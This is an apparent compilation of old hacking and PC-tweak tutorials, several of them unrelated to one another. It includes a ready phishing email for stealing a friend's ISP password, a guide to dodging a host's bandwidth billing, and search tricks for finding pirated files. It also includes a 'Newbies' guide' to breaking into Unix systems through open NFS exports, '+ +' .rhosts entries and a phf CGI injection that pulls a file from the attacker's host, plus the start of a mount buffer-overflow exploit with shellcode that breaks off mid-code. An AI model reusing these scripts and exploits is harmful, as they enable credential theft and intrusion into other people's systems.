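Run it from an elevated prompt; the values only order the providers relative to one another, so a reboot is still needed for the resolver to pick them up, and restoring is a double-click on the exported .reg file.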

2. Windows 9x/ME

1. The tweak is essentially the same as in Windows 2000/XP; just the location in the Registry is slightly different. For a more detailed description see the Windows 2000/XP section above.
2. Open the Windows Registry using Regedit, and (after backing up) navigate to:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP\ServiceProvider
3. You should see the following settings:
Class=hex:08,00,00,00

LocalPriority=hex:f3,01,00,00
HostsPriority=hex:f4,01,00,00
DnsPriority=hex:d0,07,00,00
NetbtPriority=hex:d1,07,00,00
4. The "priority" lines should be changed to:
LocalPriority=hex:05,00,00,00
HostsPriority=hex:06,00,00,00
DnsPriority=hex:07,00,00,00
NetbtPriority=hex:08,00,00,00
5. Reboot for changes to take effect

3. System.ini IRQ Tweak - Windows 9x/ME ONLY

1. Find your Network Card's IRQ

1. In order to add the entry to your System.ini file, you'd first have to find your NIC's IRQ
2. Right-click on My Computer icon on your Desktop, then left-click on Properties (a shortcut for that would be to press the 'Windows' + 'Pause' keys). Navigate to Device Manager and double-click on Computer. Under "View Resources" you will find a list of IRQs, each with description of the device that's using it. Note the IRQ number used by your Network Adapter

2. Adding the entry to System.ini

1. Once you've found the IRQ of your Network Card, you need to reserve some RAM for its use, by adding an entry to the System.ini file. You can edit the file in any text editor, however the easiest way is to use Windows' built in "System Configuration Editor"
2. Navigate to Start > Run and type sysedit. Find the [386enh] section in the System.ini file and add Irq[n]=4096 under it, where [n] is the IRQ number of your NIC and 4096 is the amount of RAM you want to reserve in KB. We recommend using 4096; however, you can experiment with different values if you want. Save changes in the file, exit and reboot for changes to take effect.
Note: If you choose to try different values, keep in mind that reserving too much RAM for your NIC will decrease the amount of RAM available for applications, while reserving too little might not give the desired effect

3. Additional Thoughts
1. The only negative effect of the System.ini IRQ tweak is that it will reduce the amount of RAM available for running applications a bit, by reserving some specifically for your Network Card's use. The gain in performance usually outweighs the negative effect by far, considering any Computer with 32Mb of RAM or more
2. This tweak may or may not work for you. It is not a documented tweak by Windows
3. Keep in mind that if you add hardware to your system the IRQ of the Network Adapter might change, in which case you will need to modify the setting in System.ini
4. In systems with multiple NICs, you might want to add the setting for both IRQs. Also, you could reserve RAM for other IRQs if you wish, just use common sense and don't forget it reduces the amount of RAM available for running applications
5. If you are using an USB device, it does not have a specific IRQ, however you can try adding the entry using the IRQ of the USB Controller
6. For internal Cable Modems, you'd have to add the entry using the IRQ of your modem, rather than the IRQ of a Network Card



RESULTS WILL VARY
No matter how good your systems may be, they're only as effective as what you put into them.

How to Get someones ISP password, Get free internet


1.) Run your telnet program:
on Windows, go to START -> RUN -> "TELNET".
on Linux, open a shell and type telnet.
2.) Then connect (on Windows "connect", on Linux "open") to some anonymous server, i.e. an open SMTP relay; if you don't have any then search for one, if you are too lame then email me now! I'll give you one in a minute! Note: you should connect to the server's mail program (port 25)!
3.) Now write the following:

mail from:[**YOUR FRIEND'S ISP WEBMASTER**]
rcpt to:[**YOUR FRIEND'S EMAIL ADDRESS**]
data
Hi there [YOUR FRIEND'S NAME], this is the [NAME OF YOUR FRIEND'S ISP] support team. Lately our server had some problems with the connection and the user-password files were destroyed; a backup was then released, and it was OK.
But yesterday we found out that it is not an updated version of the file, so it will start charging you a larger amount of money for each hour you use!
- - - - - - - - - - - - - -
To correct the problem, we have made a special program to correct the error; all YOU have to do is email:
"[**YOUR FRIEND'S ISP NAME**]@GalaxyCorp.Com" and in the SUBJECT write your "user name" and "password".

note: No money will be returned if you don't follow our instructions!

thank you,
the support team!

4.) Press enter twice, then write "." (without the "") and press ENTER!

--
Now, the places where you saw ** may be where you didn't understand it all, so I'll give you a simple example.

[**YOUR FRIEND'S ISP WEBMASTER**] - for example, if your friend is connected through AOL, then type "webmaster@aol.com", get it?

[**YOUR FRIEND'S EMAIL ADDRESS**] - for example, if your friend's email is john@aol.com, then type "john@aol.com".

[YOUR FRIEND'S NAME] - if your friend is called "John" then type "John".

[NAME OF YOUR FRIEND'S ISP] - if your friend is connected through AOL (America Online), then type "America Online".

"[**YOUR FRIEND'S ISP NAME**]@GalaxyCorp.Com" - this is the hard part, but if you are reading this, then don't worry, you're one step from the end!

* Launch your WWW browser (Microsoft Internet Explorer / Netscape) and go to "HTTP://www.galaxycorp.com".

* Sign up there for an account. When they ask what username you want, try the closest thing to your friend's ISP name (e.g. if your friend is connected through America Online [AOL] then try "aol" or "a_o_l" or "american_online"!)

* And when they ask for your email, type your real one!!!
Now continue your normal life, and remember to read your email!
If you suddenly get a message from your friend's email address, and the subject is "john j4o87HnzG", then guess what, you just saved $10 a month!

How To Get Top Ranking, Search Engines

This tutorial is all about getting your site listed at the top of search engines, i.e. search engine optimization.

First thing you need to do is find the keywords you want to optimize for.

There is great tool by Overture (/http://inventory.overture.com/d/sea...ory/suggestion/)

But I would suggest using this free tool called GoodKeywords (/http://www.goodkeywords.com/products/gkw/)

This one does the same job as Overture but also supports other search engines (Lycos, Teoma, etc.).

For example, if you want to optimize for the keyword "tech news", just search for that keyword in any of the tools above. It will show you related keywords and the number of searches for each.

Pick the keywords which are related to your site.

For example when you search for "Tech News" you'll see the following results:

Count Search Term
11770 tech news
351 itt news tech
191 high tech news
60 news tech texas
49 computer tech news
42 bio news tech
34 in itt news tech
30 news tech virginia
29 asia news tech
25 hi tech news
25 sci tech news

Now see what other terms are related to your keyword, e.g. "technology news".

Do a couple of searches like that and note down around 15-20 keywords.
Then keep the most-searched keywords at the top.

Now you need a title tag for the page.

The title tag should include the top 3 keywords; for "tech news" it could be:

"Latest Tech News, Information Technology News and Other computer related news here."

Remember that it should not be more than 95 characters and should not have more than 3 commas; some search engines might consider more than 3 commas as spam.

Now move on to meta tags.

You need the following meta tags in the web page:

No need to have other meta tags like abstract, revisit and so on; most people don't read them.

Now...

The content-type tag says the content type is HTML and the character set is iso-8859-1. There are other character sets, but this is the one most used.



The keywords tag should have all your keywords inside, starting from the keyword with the most counts.

The keywords tag for our example would be something like:

Remember to put around 15-20 keywords max, not more than that. Don't repeat keywords, and don't stuff in variants like "tech news", "info tech news", "latest tech news" and so on.



The description tag: provide a short description of your site and include all the keywords mentioned in the title tag.

The description tag should be:

It can be up to 255 characters; avoid using more than 3 commas.



The robots tag is used for search robots. The following explanation will help you:

index,follow = index the page as well as follow the links
noindex,follow = dont index the page but follow the links
index,nofollow = index the page but dont follow the links
noindex,nofollow = dont index page, dont follow the links
all = same as index,follow
none = same as noindex,nofollow
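As an added example (not part of the tutorial), here is a small Python checker that applies the limits stated above to a page's head: title up to 95 characters with at most 3 commas, at most 20 unique keywords, description up to 255 characters with at most 3 commas, a robots value from the list, and a charset in the content-type tag. The two sample documents it checks are constructed for the demonstration.

```python
"""Check a page's <head> against the limits the tutorial gives for the
title, keywords, description, robots and content-type tags.

Added example, not part of the original tutorial. The two sample
documents at the bottom are constructed for the demonstration."""
from html.parser import HTMLParser

# Robots directives the tutorial lists.
ROBOTS_VALUES = {
    "index,follow", "noindex,follow", "index,nofollow",
    "noindex,nofollow", "all", "none",
}


class HeadParser(HTMLParser):
    """Collect the <title> text and the <meta> tags of a document."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.meta = {}          # lower-cased name or http-equiv -> content
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "meta":
            key = attrs.get("name") or attrs.get("http-equiv")
            if key:
                self.meta[key.lower()] = attrs.get("content") or ""

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def check_head(document):
    """Return the list of rules the document breaks (empty = all good)."""
    parser = HeadParser()
    parser.feed(document)
    problems = []

    title = parser.title.strip()
    if not title:
        problems.append("title: missing")
    if len(title) > 95:
        problems.append("title: longer than 95 characters")
    if title.count(",") > 3:
        problems.append("title: more than 3 commas")

    raw = parser.meta.get("keywords", "")
    keywords = [k.strip().lower() for k in raw.split(",") if k.strip()]
    if not keywords:
        problems.append("keywords: missing")
    if len(keywords) > 20:
        problems.append("keywords: more than 20 entries")
    if len(keywords) != len(set(keywords)):
        problems.append("keywords: duplicate entries")

    description = parser.meta.get("description", "")
    if len(description) > 255:
        problems.append("description: longer than 255 characters")
    if description.count(",") > 3:
        problems.append("description: more than 3 commas")

    robots = parser.meta.get("robots", "").replace(" ", "").lower()
    if robots and robots not in ROBOTS_VALUES:
        problems.append("robots: unknown value %r" % robots)

    if "charset=" not in parser.meta.get("content-type", "").lower():
        problems.append("content-type: no charset declared")
    return problems


# Constructed sample that follows every rule in the tutorial.
GOOD_HEAD = """<html><head>
<title>Latest Tech News, Information Technology News and Other Computer Related News</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords" content="tech news, high tech news, computer tech news, hi tech news, sci tech news">
<meta name="description" content="Latest tech news, information technology news and computer related news and reviews.">
<meta name="robots" content="index,follow">
</head><body></body></html>"""

# Constructed sample that breaks several rules at once.
BAD_HEAD = """<html><head>
<title>Tech News, Tech News, Tech News, Tech News, Tech News</title>
<meta name="keywords" content="tech news, tech news">
<meta name="robots" content="index,follow,archive">
</head><body></body></html>"""

if __name__ == "__main__":
    print("good:", check_head(GOOD_HEAD))
    print("bad:", check_head(BAD_HEAD))
```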

Now move on to the body part of the page.

Include all top 3 keywords here;
I would suggest breaking the keywords up and using the parts...

For example

YourSiteName.com one stop for all kind of Latest Tech News and Computer Related information and reviews.................

Include main keywords in heading tags, starting with H1 and then moving to H2, H3, etc.

The H1 tag will be too big, but CSS can help you there: define a small font size in CSS for the H1, H2, ... tags.

When done with the page copy, you need to provide title and alt attributes for images and links.

Use some keywords in them, but don't add all the keywords, and if not necessary don't use keywords in them at all; basically they should explain what the image is all about.

Remember to add the top keyword at least 4 times in the body and the other 2 keywords thrice and twice respectively.

Now move on to the footer part.
Try to include the top keywords here and see the effect; use site keywords as links, i.e.

Tech News Software News etc..

Now finally, you need to read some more stuff; maybe you can call it the bottom lines...

Site map - This is a page where you put all the links present in your site. It will help search engines find the links easily. Also provide a link to the site map in the footer, as search engines start scanning the page from the bottom.

robots.txt - This file contains the directories which should not be scanned by search engines. More info can be found here: /http://www.robotstxt.org/wc/exclusion.html. Search engines like Google and Yahoo ask for the robots.txt file.

Valid HTML - Your code should have valid HTML and a doctype. It's kind of difficult to follow all the standards, but you can at least open and close all tags properly. You can check your page's HTML online here: /http://validator.w3.org/ or use the free software HTML Tidy: /http://tidy.sourceforge.net/

All done; now you just need to check your site with this script, called SEO Doctor: /http://www.instantposition.com/seo_doctor.cfm

It will show you a report of your site with solutions.

Now correct the errors and start submitting the site:

Start with Google: /http://google.com/addurl.html
then Yahoo: /http://submit.search.yahoo.com/free/request
then move to AltaVista, AllTheWeb and other search engines.

Also submit your site to directories like /http://dmoz.org, /http://jayde.com, etc.
Dmoz is a must, as Google, Yahoo and many more search engines use the same directory.

And remember, don't try to spam with keywords in these directories; dmoz is handled by human editors.

Submitted the site, but still can't see your site on top?

Wait for some time, maybe a month or so, but keep an eye on your search term. Use /http://GoogleAlert.com - whenever Google updates for your keywords, it will mail you the new results.

Also check whether your site is listed on Google;
use the tool called Google Monitor, which can be downloaded for free from: /http://www.cleverstat.com/google-monitor.htm

How To Block Websites Without Software, block websites

Steps:

1] Browse to C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in Notepad
4] Under "127.0.0.1 localhost" add 127.0.0.2 www.sitenameyouwantblocked.com, and that site will no longer be accessible.
5] Done!

-So-

127.0.0.1 localhost
127.0.0.2 www.blockedsite.com

-->www.blockedsite.com is now inaccessible<--


For every site you want to add after that, just add 1 to the last number of the loopback address (127.0.0.2) and then the address as before.

i.e.: 127.0.0.3 www.blablabla.com
127.0.0.4 www.blablabla.com
127.0.0.5 www.blablabla.com

etc
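As an added example (not from the original post), the Python audit below reads a hosts file back and lists every name it sends to a loopback or unspecified address, i.e. the names the file blocks. It treats any 127.0.0.0/8 address as loopback, so it catches the incrementing scheme above as well as a file that reuses 127.0.0.1 or 0.0.0.0; the same check is how a responder spots a hosts file that malware has edited to cut off update or security sites. The sample hosts content is constructed.

```python
"""List the host names a hosts file redirects to a loopback or
unspecified address, i.e. the names the file blocks.

Added example, not from the original post. The sample content below is
constructed; the example.invalid names are placeholders."""
import ipaddress

# Names that legitimately point at loopback and must not be reported.
LOCAL_NAMES = {"localhost", "localhost.localdomain",
               "ip6-localhost", "ip6-loopback"}


def parse_hosts(text):
    """Yield (address, hostname) pairs from hosts-file text.

    Comments start with '#', fields are whitespace separated, and one
    line may carry several names for the same address.
    """
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue            # address with no name: nothing to map
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue            # not a valid address: skip the line
        for name in fields[1:]:
            yield addr, name.lower()


def blocked_names(text):
    """Return the sorted list of (hostname, address) entries that send a
    non-local name to a loopback (127/8, ::1) or unspecified (0.0.0.0)
    address."""
    found = []
    for addr, name in parse_hosts(text):
        if name in LOCAL_NAMES:
            continue
        if addr.is_loopback or addr.is_unspecified:
            found.append((name, str(addr)))
    return sorted(found)


# Constructed sample hosts file, written the way the steps above describe.
SAMPLE_HOSTS = """\
# constructed sample hosts file
127.0.0.1       localhost
::1             localhost ip6-localhost
127.0.0.2       www.blockedsite.com
127.0.0.3       www.blablabla.com   # next site, last octet incremented
0.0.0.0         ads.example.invalid
192.0.2.10      intranet.example.invalid   # a real mapping, not a block
"""

if __name__ == "__main__":
    for name, addr in blocked_names(SAMPLE_HOSTS):
        print(f"{name:30} -> {addr}")
```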

Google Tips & Tricks

==================================================
Utilizing search engines
==================================================

So much information is on the web, it's mind boggling. Thankfully we have search
engines to sift through it and categorize it for us. Unfortunately, there is still so
much info that even with these search engines, it's often a painstakingly slow process
(something comparable to death for a hacker) to find exactly what you're looking for.

Lets get right into it.

I use google.com as my primary search engine because it presently tops the charts as far as
the sites that it indexes which means more pertinent info per search.

1. Page translation.
Just because someone speaks another language doesn't mean they don't have anything useful to say. I use translation tools like the ones found at

http://babelfish.altavista.com
and

http://world.altavista.com
to translate a few key words I am searching for. Be specific and creative because these tools aren't the most accurate things on the planet.

2. Directories.
These days everything is about $$$. We have to deal with SEO (search engine optimization), which seems like a good idea on paper until you do a search for toys and get 5 porn sites in the first 10 results. Using a site's directory will eliminate that. You can narrow your search down easily by looking for the info in specific categories. (PS: Google DOES have directories; they're at directory.google.com)

3. Here are some tips that google refers to as "advanced"

A. "xxxx" / will look for the exact phrase. (google isnt case sensitive)
B. -x / will search for something excluding a certain term
C. filetype:xxx / searches for a particular file extension (exe, mp3, etc)
D. -filetype:xxx / excludes a particular file extension
E. allinurl:x / term in the url
F. allintext:x / terms in the text of the page
G. allintitle:x / terms in the html title of that page
H. allinanchor:x / terms in the links

4. OR
Self explanatory, one or the other... (ie: binder OR joiner)

5. ~X
Synonyms/similar terms (in case you can't think of any yourself)

6. Numbers in a range.
Lets say you're looking for an mp3 player but only want to spend up to $90. Why swim through all the others? MP3 player $0..$90 The 2 periods will set a numeric range to search between. This also works with dates, weights, etc

7. +
Ever type in a search and see something like this:
"The following words are very common and were not included in your search:"
Well, what if those common words are important in your search? You can force google to search through even the common terms by putting a + in front of the denied word.

8. Preferences
It amazes me when I use other people's PCs that they don't have their Google search preferences saved. When you use Google as much as I do, who can afford not to have preferences? They're located on the right of the search box and have several options, though I only find 2 applicable for myself...
A. Open results in new browser
B. Display 10-100 results per page. (I currently use 50 per page, but that's a resolution preference, and 5x the default)

9. *
Wildcard searches. Great when applied to a previously mentioned method. If you only know the name of a prog, or are looking for ALL of a particular file (ie. you're DLing tunes) something like *.mp3 would list every mp3.

10. Ever see this?
"In order to show you the most relevant results, we have omitted some entries very similar to the X already displayed. If you like, you can repeat the search with the omitted results included." The answer is YES. yes yes yes. Did I mention yes? I meant to.

11. Search EVERYWHERE
Use the engine to its fullest. If you don't find your answer in the web section, try the group section. Hell, try a whole different search engine. Don't limit yourself, because sometimes engines seem to intentionally leave results out.
ex. use Google, Yahoo, and AltaVista. Search the same terms... pretty close, right? Now search for disney death. Funny, AltaVista has plenty of disney, but no death...hmmm.

If you've read this far into this tutorial without saying, "Great, a guy that copied a few Google help pages and thinks it's useful info," then I will show you WHY (besides accuracy, speed, and consistency finding info on ANYTHING) it's nice to know how a search engine works. You combine it with your knowledge of other protocols.

Example:
Want free music? Free games? Free software? Free movies? God bless FTP! Try this search:
intitle:"Index of music" "rolling stones" mp3
Substitute rolling stones/w your favorite band. No? Try the song name, or another file format. Play with it. Assuming SOMEONE made an FTP and uploaded it, you'll find it.

For example....I wanted to find some Sepultura. If you never heard them before, they're a Brazilian heavy metal band that kicks ass. I started with this:
intitle:"Index of music" "Sepultura" mp3 <-- nothing
intitle:"Index of música" "Sepultura" mp3 <-- nothing
intitle:"Index of musica" "Sepultura" mp3 <-- not good enough
intitle:"Index of music" "Sepultura" * <-- found great stuff, but not enough Sepultura

At this point it occurs to me that I may be missing something, so I try:
intitle:"index of *" "sepultura" mp3 <-- BANG!
(and thats without searching for spelling errors)
Also try inurl:ftp

I find that * works better for me than trying to guess other peoples mis-spellings.

The same method applies for ebooks, games, movies, SW, anything that may be on an FTP site.

I hope you enjoyed this tutorial. I saw that recently a book and an article were written on the very same topic. I haven't read them as of yet, but check them out, and get back to me if you feel I missed something important and should include anything else.

intitle:"index of" "google hacks" ebook


Ps. I've said it before, I'll say it again... BE CREATIVE.
You'll be surprised what you can find.

Get unlimited bandwidth from your host for free

NOTE: This applies only to specific hosting companies, due to the
specific setup needed and does have its drawbacks.

While setting up hosting space with a specific company I often deal
with, I noticed that they used a shared IP (an IP shared by two or more
websites/domains). Well, the rates for unlimited bandwidth were
around $50+ per month, which I found unreasonable. I didn't require
much space, and didn't want to be limited to a mere 3 gig of traffic
per month.

Back on track... When setting up the account, the hosting company needs
to know the domain name so that they can direct it accordingly.
(example: 'http://www.123.4.567.890/~user1/ ,
'http://www.123.4.567.890/~user2/ etc)

At this point you can give a URL that doesn't belong to you at all. As
long as the nameservers don't change, that should have absolutely no
negative effects on you or your site whatsoever.

How it works is this:
The host allocates you a certain amount of space on its servers, and
monitors the traffic that enters that space through the domain it's
registered under. Since the domain isn't connected to the site
at all, it registers ZERO traffic.

Zero traffic registered = can't possibly go over bandwidth
restrictions
can't possibly go over bandwidth restrictions = free unlimited
bandwidth

Now the problems with this (besides the ethical ones) are that your
host may offer X number of mail addresses with the account
(you@y...) and these will not work, as the name isn't on their
DNS. However, some domain companies allow you to set it up
regardless. Another problem seems to be strictly cosmetic, but can be
highly problematic... Once you attach the domain you want onto the
site, each page comes up with the IP/username the host assigned to your
account. It's at this point where you have to have a phenomenal 10-15
character alphanumeric or better (#, &, etc.) password, or your site will
be vulnerable to attack since the attacker already has your username. This
only gives attackers a slight advantage, as the amount of time it
would take to brute force a 10 character password at a rate of 1,000,000 per
second is 10 years. Add numbers and case sensitivity to that and it
becomes approx 26,980 years.

While I'm on it, I may as well add that if you use this method,
obviously you are going to be using the lowest cost hosting plan
available, which in turn will offer the least amount of space. That's
why free hosts were invented.

Free hosts suck as a general rule. Who wants a site smothered in ads?
However, if you upload all your programs, graphics and other large
files (have a backup of course) to a reliable free host and link to
them accordingly from your site, you have just freed up a significant
amount of space. The only setback with this is having to keep an index
card or file around with your passwords, as you should never use the same one
twice, and want to use complicated ones.

The Newbies-User's Guide to Hacking

User's guide
__________________________

Well, howdi folks... I guess you are all wondering who's this guy (me)
that's trying to show you a bit of everything... ?
Well, I ain't telling you anything of that...
Copyright, and other stuff like this (below).

Copyright and stuff...
______________________

If you feel offended by this subject (hacking) or you think that you could
do better, don't read the below information...
This file is for educational purposes ONLY...;)
I ain't responsible for any damages you made after reading this...(I'm very
serious...)
So this can be copied, but not modified (send me the changes, and if they
are good, I'll include them ).
Don't read it, 'cuz it might be illegal.
I warned you...
If you would like to continue, press .


Intro: Hacking step by step.
_________________________________________________________________________________

Well, this ain't exactly for beginners, but it'll have to do.
What all hackers have to know is that there are 4 steps in hacking...

Step 1: Getting access to site.
Step 2: Hacking r00t.
Step 3: Covering your traces.
Step 4: Keeping that account.

Ok. In the next pages we'll see exactly what I meant.

Step 1: Getting access.
_______

Well folks, there are several methods to get access to a site.
I'll try to explain the most used ones.
The first thing I do is see if the system has an export list:

mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.

If it gives a message like this one, then it's time to search for another way
in.
What I was trying to do was to exploit an old security problem in most
SunOS versions that could allow a remote attacker to add a .rhosts to a user's
home directory... (That was possible if the site had mounted their home
directory.)
Let's see what happens...


mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr victim2.site.com
/home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/
1 -rw------- 1 root root 242 Mar 9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/

Well, we wanna hack into rapper's home.
mysite:~>id
uid=0 euid=0
mysite:~>whoami
root
mysite:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd

We use /bin/csh 'cuz bash leaves a (Damn!) .bash_history and you might
forget it on the remote server...

mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/
1 -rw------- 1 root root 242 Mar 9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/

So we own this guy's home directory...

mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com.
SunOs ver....(crap).
victim1:~$
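The condition the walkthrough above depends on is a /home export offered to "(everyone)"; as an added defensive check (not part of the guide), the Python audit below parses the text that `showmount -e` prints and flags exports any client may mount, and checks an .rhosts file for the "+ +" entry that trusts every host and user. The samples are constructed from the output shown above.

```python
"""Flag NFS exports that any client may mount, and .rhosts files that
trust every host.

Added example, not part of the original guide. The samples below are
constructed from the showmount output shown in the walkthrough."""


def parse_exports(text):
    """Return {export_path: [client, ...]} from `showmount -e` output.

    A leading "Export list for host:" line is ignored; every other line
    is a path followed by a comma-separated list of allowed clients.
    """
    exports = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list"):
            continue
        parts = line.split(None, 1)
        clients = parts[1] if len(parts) > 1 else ""
        exports[parts[0]] = [c.strip() for c in clients.split(",") if c.strip()]
    return exports


def open_exports(text):
    """Return the export paths that are offered to every client, either
    as "(everyone)" (showmount's wording) or as a bare "*" wildcard."""
    risky = []
    for path, clients in parse_exports(text).items():
        if any(c in ("(everyone)", "*") for c in clients):
            risky.append(path)
    return risky


def rhosts_trusts_everyone(text):
    """True if an .rhosts file has a '+' host entry: "+ +" lets any user
    on any host log in as the owner without a password."""
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if fields and fields[0] == "+":
            return True
    return False


# Constructed from the showmount output in the walkthrough above.
SAMPLE_SHOWMOUNT = """\
Export list for victim1.site.com:
/usr   victim2.site.com
/home  (everyone)
/cdrom (everyone)
"""

if __name__ == "__main__":
    for path in open_exports(SAMPLE_SHOWMOUNT):
        print("open to everyone:", path)
    print("rhosts trusts everyone:", rhosts_trusts_everyone("+ +\n"))
```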

This is the first method...
Another method is to see if the site has port 80 open. That would
mean that the site has a web page.
(And that's very bad, because it's usually vulnerable.)
Below I include the source of a scanner that helped me before NMAP was written.
(Get it at http://www.dhp.com/~fyodor. Good job, Fyodor.)
NMAP is a scanner that even does stealth scanning, so lots of systems won't
record it.

/* -*-C-*- tcpprobe.c */
/* tcpprobe - report on which tcp ports accept connections */
/* IO ERROR, error@axs.net, Sep 15, 1995 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(int argc, char **argv)
{
    struct hostent *host;
    int err, i, net;
    struct sockaddr_in sa;

    if (argc != 2) {
        printf("Usage: %s hostname\n", argv[0]);
        exit(1);
    }

    /* try a plain connect() on every port below 1024 */
    for (i = 1; i < 1024; i++) {
        memset(&sa, 0, sizeof sa);
        sa.sin_family = AF_INET;
        if (isdigit((unsigned char)*argv[1]))
            sa.sin_addr.s_addr = inet_addr(argv[1]);
        else if ((host = gethostbyname(argv[1])) != 0)
            memcpy(&sa.sin_addr, host->h_addr, sizeof sa.sin_addr);
        else {
            herror(argv[1]);
            exit(2);
        }
        sa.sin_port = htons(i);
        net = socket(AF_INET, SOCK_STREAM, 0);
        if (net < 0) {
            perror("\nsocket");
            exit(2);
        }
        err = connect(net, (struct sockaddr *) &sa, sizeof sa);
        if (err < 0) {
            /* refused or unreachable: overwrite the status line and move on */
            printf("%s %-5d %s\r", argv[1], i, strerror(errno));
            fflush(stdout);
        } else {
            printf("%s %-5d accepted. \n", argv[1], i);
            if (shutdown(net, 2) < 0) {
                perror("\nshutdown");
                exit(2);
            }
        }
        close(net);
    }
    printf(" \r");
    fflush(stdout);
    return (0);
}

Well, now be very careful with the exploits below, because they usually get
logged.
Besides, if you really want to get a source file from /cgi-bin/, use this
syntax: lynx http://www.victim1.com//cgi-bin/finger
If you don't want to do that, then do:

mysite:~>echo "+ +" > /tmp/rhosts

mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+
/root/.rhosts" | nc -v - 20 victim1.site.com 80

then
mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#

Or maybe just try to find out usernames and passwords...
The usual users are "test", "guest", and maybe the owner of the site...
I usually don't do such things, but you can...

Or, if the site is really old, use that old (quote site exec) bug for
wu.ftpd.
There are a lot of other exploits, like the remote exploits (innd, imap2,
pop3, etc...) that you can find at rootshell.connectnet.com or at
dhp.com/~fyodor.

Enough about this topic. (Besides, if you can finger the site, you can
figure out usernames, and maybe by guessing passwords (sigh!) you could get
access to the site.)


Step 2: Hacking r00t.
______

First you have to find out which system it's running...
a) LINUX
All versions:
A big bug for all Linux versions is mount/umount and (maybe) lpr.

/* Mount Exploit for Linux, Jul 30 1996

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::
:::::::...........:::...........:::...........::.......:......:.......::::::
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::

Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include
#include
#include
#include
#include

#define PATH_MOUNT "/bin/mount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;

/* fill start of buffer with nops */

memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);

/* stick asm code into the buffer */

for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
